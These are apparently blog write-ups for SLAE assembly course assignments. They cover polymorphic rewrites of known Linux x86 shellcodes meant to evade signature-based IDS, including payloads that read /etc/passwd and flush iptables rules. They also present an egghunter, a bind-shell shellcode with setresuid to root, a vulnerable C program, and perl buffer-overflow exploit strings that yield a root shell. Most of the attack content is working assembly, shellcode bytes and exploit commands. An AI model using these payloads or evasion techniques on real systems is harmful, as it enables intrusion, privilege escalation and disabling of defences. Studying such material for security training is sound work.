SLAE Assignment 6 - Polymorphic Shellcodes

SLAE Assignment 6 - Polymorphic Shellcodes

 

Objective 

 

The objective of this assignment is to create polymorphic shellcodes of already existing and well known shellcodes . Polymorphism is a way to bypass signature based intrusion detection systems . 

A polymorphic shellcode is created by modifying an already existing shellcode in an assembly level without changing its original functionalities . 

Shellcode 1 : http://shell-storm.org/shellcode/files/shellcode-842.php

Original Author - Tiny Read File Shellcode - Geyslan G. Bem, Hacking bits

The first step was to obtain the assembly code from the shellcode . i used ndisasm to extract them . 

As you can see from the above screenshot the original author used 3 system calls in his code . They were open , read and write . The open ( 5) system call was used to open the /etc/passwd file and then the read ( 3) system call was used to read upto 4096 bytes from the passwd file . Then the write (4) system call is called to print the file details to the screen . 

My aim was to change the assembly code in a way that it is different from the above code so that a signature based IDS/ IPS should not catch the code even if the original signature is present in its database . 

I made the following changes . 

 

Original Shellcode	Polymorphic Shellcode
xor ecx,ecx mul ecx mov al,0x5 push ecx push dword 0x64777373 push dword 0x61702f63 push dword 0x74652f2f mov ebx,esp int 0x80 xchg eax,ebx xchg eax,ecx mov al,0x3 xor edx,edx mov dx,0xfff inc edx int 0x80 xchg eax,edx xor eax,eax mov al,0x4 mov bl,0x1 int 0x80 xchg eax,ebx int 0x80	xor ecx,ecx mul ecx stc mov al,0x4 inc al clc push ecx mov edx, 0x53666262 add edx, 0x11111111 push edx push dword 0x61702f63 xor edx,edx mov edx, 0x85764040 sub edx, 0x11111111 push edx mov ebx,esp int 0x80 xchg eax,ebx xchg eax,ecx mov al,0x4 dec al xor edx,edx mov dx,0xfff inc edx int 0x80 xchg eax,edx xor eax,eax mov al,0x4 mov bl,0x1 int 0x80 xchg eax,ebx int 0x80

 We have learned during the SLAE class that most of the assembly logic can be expressed in more than one form . I used many techniques learned in the course to express the code in a different format.The mainly used techniques were the following .

Using arithmetic logic to input same values in different ways ,

for eg push 0x33333333 can be also expressed as ,

mov ebx, 0x22222222
add ebx, 0x11111111

Adding random assembly code which doesn't have any impact , 

for eg the flags like STC - set carry flag and CLC - clear carry flags can be added to create randomness to the code , the carry flag will not have an impact during the execution of the current shellcode . 

Execution

Now its time to execute the polymorphic code to see if its works . As usual we will compile and link the code and obtain the opcodes for the shellcode . 

As you can see it was a success . The shellcode length was 73 which was less than our cutoff ( not more than 150% of original code)

Shellcode 2 : http://shell-storm.org/shellcode/files/shellcode-361.php

Original Author :

/rootteam/dev0id (www.sysworld.net) 58 bytes

jmp     short   callme main:         pop     esi         xor     eax,eax         mov byte [esi+14],al         mov byte [esi+17],al         mov long [esi+18],esi         lea     ebx,[esi+15]         mov long [esi+22],ebx         mov long [esi+26],eax         mov     al,0x0b         mov     ebx,esi         lea     ecx,[esi+18]         lea     edx,[esi+26]         int     0x80         callme:         call    main         db '/sbin/iptables#-F#'

 Shellcode usage : The above shellcode will flush the iptables firewall rules . IPtables is the default firewall present in linux OS and its pretty usefull .

 I have modified the above nasm file to the following .

global _start _start: xor eax,eax push eax push dword 0x73656c62 push dword 0x61747069 push dword 0x2f6e6962 mov edx, 0x11111111 add edx, 0x621e1e1e push edx mov ebx, esp push eax push word 0x462d mov esi, esp push eax push esi push ebx mov ecx,esp mov edx,eax mov al,0xa inc al int 0x80

Now lets try executing the shellcode .I have setup a rule in the iptables as below .

Now we will execute the shellcode and see the outcome .

We can see that the shellcode executed successfully and the rules were flushed . The total shellcode length is 52 bytes which is less than the original 58 byte shellcode  .

Shellcode 3 :http://shell-storm.org/shellcode/files/shellcode-848.php

Original Author - Hamid Zamani

Linux/x86 - Set '/proc/sys/net/ipv4/ip_forward' to '0' & exit() .Size : 83 Bytes.

See below the shellcode in intel format .  

The shellcode uses 4 system calls . It uses Open , read , write and exit to complete the shellcode .
IP forwarding is done to forward packets from one interface to another , or in essence this is how router works .

Lets modify the shellcode .

i have done some changes and you can see the 2 shellcodes side by side .

xor eax,eax push eax push dword 0x64726177 push dword 0x726f665f push dword 0x70692f34 push dword 0x7670692f push dword 0x74656e2f push dword 0x2f737973 push dword 0x2f636f72 push word 0x702f mov ebx,esp xor ecx,ecx mov cl,0x1 mov al,0x5 int 0x80 mov ebx,eax xor ecx,ecx push ecx push byte +0x30 mov ecx,esp xor edx,edx mov dl,0x1 mov al,0x4 int 0x80 xor eax,eax add eax,byte +0x6 int 0x80 xor eax,eax inc eax xor ebx,ebx int 0x80

xor ecx, ecx mul ecx push eax mov ebx, 0x726f665f xor ebx, 0x161d0728 push ebx push dword 0x726f665f push dword 0x70692f34 push dword 0x7670692f push dword 0x74656e2f push dword 0x2f737973 push dword 0x2f636f72 push word 0x702f mov ebx,esp xor ecx,ecx mov cl,0x1 mov al,0x6 dec al int 0x80 mov ebx, eax xor ecx,ecx push ecx push byte 0x30 mov ecx,esp xor edx,edx mov dl,0x1 mov al,0x3 inc al int 0x80 xor eax,eax add eax,byte 0x6 int 0x80 xor eax,eax add eax, 0x1 xor ebx,ebx int 0x80

The new shellcode length is 98 which is less than the allowed size ( 150% of original shellcode )
 Now lets execute the shellcode and see the output .

As you can clearly see from the above picture the value of the particular file is now changed to 0 from 1.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE – 739

All the files used can be found https://github.com/rtv7/SLAE

SLAE Assignment 3 - EggHunter

SLAE Assignment 3 - EggHunter 

 

Objective 

 

The objective of the task is to create an egghunting shellcode . Egghunting shellcodes are very useful in cases where the area we control after a crash is less and can't afford a large shellcode . Egghunting shellcode normally uses less space and it can be used to mark our shellcode in memory via a known pattern . 

The best paper to learn about egghunter implementation is "Safely Searching Process Virtual Address Space" by skape . The author has provided 3 egghunter methods for Linux . 

They are , access (2) , access ( 2 ) revisited and sigaction (2) system calls .  

I am focusing on  the access (2) revisited method for this post . The following is the nasm file created.

rtv@dink0ism:~/Exercise3$ cat egg_hunter2.nasm ; Egg - 0xF890F990 global _start         section .text _start:         xor edx, edx allignpage:         or dx, 0xfff nextaddr:         inc edx         lea ebx, [edx+0x4]         push byte 0x21    ; system call for access(2)         pop eax         int 0x80         cmp al, 0xf2        ; checking for EFAULT         je allignpage       ; going back to page allignment         mov eax, 0xF890F990 ; egg         mov edi, edx         scasd         jne nextaddr         scasd         jne nextaddr         jmp edi

 The following are the major steps .

1. Initialize the edx register
2. Perform a page alignment operation 
3. Syscall for access (2) is triggered
4. Check if we got an EFAULT
5. Start the comparison of egg once address is valid
6. If we've found our egg, pass execution to it

 Lets create a sample program to test the egg hunting code . It uses a TCP bind shellcode which listens on 11111 as the final payload .

rtv@dink0ism:~/Exercise3$ cat shellcodeegg.c #include <stdio.h> #include <string.h> #include <stdlib.h> unsigned char egghunter[20]; void main() { /* bind shellcode port 11111*/   unsigned char shellcode[256] = \ "\x90\xf9\x90\xf8\x90\xf9\x90\xf8" /* Egg Identifier */ "\x6a\x06\x6a\x01\x6a\x02\x31\xdb\xb3\x01\x31\xc9\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc6\x31\xdb\x53\x66\x68\x2b\x67\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb3\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x6a\x01\x56\x31\xdb\xb3\x04\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xb3\x05\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc3\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80";  printf("Shellcode: %d bytes\n", strlen(shellcode)); /*egg hunter code */  strcpy(egghunter,"\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x90\xf9\x90\xf8\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7");  printf("Egghunter: %d bytes\n", strlen(egghunter));  int (*ret)() = (int(*)())egghunter;  ret(); }

Lets compile and execute the program .

It works and we got our bind shell after connecting to port 11111.

 

Practical Execution 

 

Now we can try the same in an actual scenario .

I will be using the below code which is vulnerable to stack based overflow . 

#include <stdio.h> int main(int argc, char *argv[]) { char buffer[256]; memcpy(buffer, argv[1],strlen(argv[1])); printf(buffer); }

After some basic fuzzing i was able to identify that the buffer overflows if we give 272 characters as input .

The final four bytes is the EIP . Also the buffer starts at 0xbffff3b0 .

Next we will try our exploit which uses egg hunting .

The final exploit should be like this ,

EGGHUNTER + 99 NOPS + SHELLCODE + EIP

which is

$(perl -e 'printf "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x90\xf9\x90\xf8\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7" . "\x90" x 99 . "\x90\xf9\x90\xf8\x90\xf9\x90\xf8\x6a\x06\x6a\x01\x6a\x02\x31\xdb\xb3\x01\x31\xc9\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc6\x31\xdb\x53\x66\x68\x2b\x67\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb3\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x6a\x01\x56\x31\xdb\xb3\x04\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xb3\x05\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc3\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80" . "\xb0\xf3\xff\xbf"')

So we will try this out now and see the outcome ,

As expected we got our shellcode working .

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE – 739

All the files used can be found here https://github.com/rtv7/SLAE

SLAE Assignment 1 - Bind Shell

SLAE Assignment 1 - Bind Shell

Objective:

The objective of the assignment is to create a bind shell which listens and accepts incoming connection and executes shell commands using /bin/sh. 

Steps:

1. Identify all the system calls required for creating the shellcode 

2. Create the Bind shellcode 

3. Practical Execution of the shellcode

Step1:

The first step is to identify all the system calls required for the shellcode .They are

a . socket 

The Socket system call is used to create socket ( TCP or UDP ) and according to its man page it will create an endpoint for communication 

b. bind 

Binds the socket to an address and a port

c. listen 

The Listen system call makes the socket listen to incoming connections 

d. accept 

This will accept an incoming connection for the socket . 

e. dup2

Creates duplicates file descriptors so that stdin , stdout and stderr will go to our socket

f. execve 

Executes  /bin/sh 

g. setresuid 

This will set the real user ID and effective user ID of the calling process . This system call is very much important in real world exploits while doing privilege escalations .

Step2:

 

The next step is to create the assembly code .The following is the assembly code created based on the above sys calls .

;Filename - Bind_shell3.nasm global _start section .text _start: ;socket(2,1,6) push 0x6 push 0x1 push 0x2 xor ebx, ebx mov bl , 0x1 xor ecx, ecx mov ecx, esp xor eax, eax mov al, 0x66 ; system call number for socket int 0x80 mov esi, eax xor ebx,ebx push ebx push word 0x672B ; port is configured here push word 0x2 mov ecx, esp push 0x10 push ecx push esi mov bl, 0x2 mov ecx, esp xor eax, eax mov al, 0x66 int 0x80 ;listen(int sockfd, 1) push 0x1 push esi xor ebx, ebx mov bl, 0x4 mov ecx, esp xor eax, eax mov al, 0x66 int 0x80 ;accept(int sockfd,NULL,NULL) xor ebx, ebx push ebx push ebx push esi mov bl, 0x5 mov ecx, esp xor eax, eax mov al, 0x66 int 0x80 mov ebx, eax push byte 2 pop ecx loop4dup: push byte 63 pop eax int 0x80 dec ecx jns loop4dup ;setresuid(0,0,0) xor eax, eax xor ebx, ebx xor ecx, ecx cdq mov BYTE al, 0xa4 int 0x80 ;execve("/bin//sh", ["/bin//sh", NULL], [NULL]) push BYTE 11 pop eax push ecx push 0x68732f2f push 0x6e69622f mov ebx, esp push ecx mov edx, esp push ebx mov ecx, esp int 0x80

Once the assembly code is ready we will compile and link the same and dump the opcodes using the command line fu learned during the SLAE course .

 

"\x6a\x06\x6a\x01\x6a\x02\x31\xdb\xb3\x01\x31\xc9\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc6\x31\xdb\x53\x66\x68\x2b\x67\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb3\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x6a\x01\x56\x31\xdb\xb3\x04\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xb3\x05\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc3\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80"

Step3:

Our  final aim is to execute the shellcode in a practical way . I used the below vulnerable code . As you can easily see the code is vulnerable to a buffer overflow attack due to lack of bounds checking.

#include <stdio.h> int main(int argc, char *argv[]) { char buffer[256]; memcpy(buffer, argv[1],strlen(argv[1])); printf(buffer); }

 Lets compile the code and test for the overflow .

 As you can see the buffer overflowed and the program crashed .

Now lets try to see if we can control the EIP after the crash.

Here we can see that the EIP points to a value that we control and we know exactly where it is .
Now our aim will be to exploit the above situation .

I have made the binary SUID and given the ownership to root . now we need to prepare for our exploit.

The total bytes needed to crash the program is 272 , our shellcode is 126 bytes long and the final four bytes is the EIP .

So our exploit should look like this .

142*NOPS + shellcode + EIP

So the final exploit will become
$(perl -e 'printf "A" x 142 . "\x6a\x06\x6a\x01\x6a\x02\x31\xdb\xb3\x01\x31\xc9\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc6\x31\xdb\x53\x66\x68\x2b\x67\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb3\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x6a\x01\x56\x31\xdb\xb3\x04\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xb3\x05\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc3\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90\xf5\xff\xbf"')

Now let us test this exploit and see the result .

Awesome , our exploit worked and we are now root .

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE – 739

Wrapper Script :

#!/usr/bin/python import struct import sys #Usage: ./wrapper <port number> x = sys.argv[1] port = struct.pack("!H", int(x)) bind_shell = ("\x6a\x06\x6a\x01\x6a\x02\x31\xdb\xb3\x01\x31\xc9\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc6\x31\xdb\x53\x66\x68" + port + "\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb3\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x6a\x01\x56\x31\xdb\xb3\x04\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xb3\x05\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc3\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80") print '"' + ''.join('\\x%02x' % ord(c) for c in bind_shell) + '";'

All the files used can be found here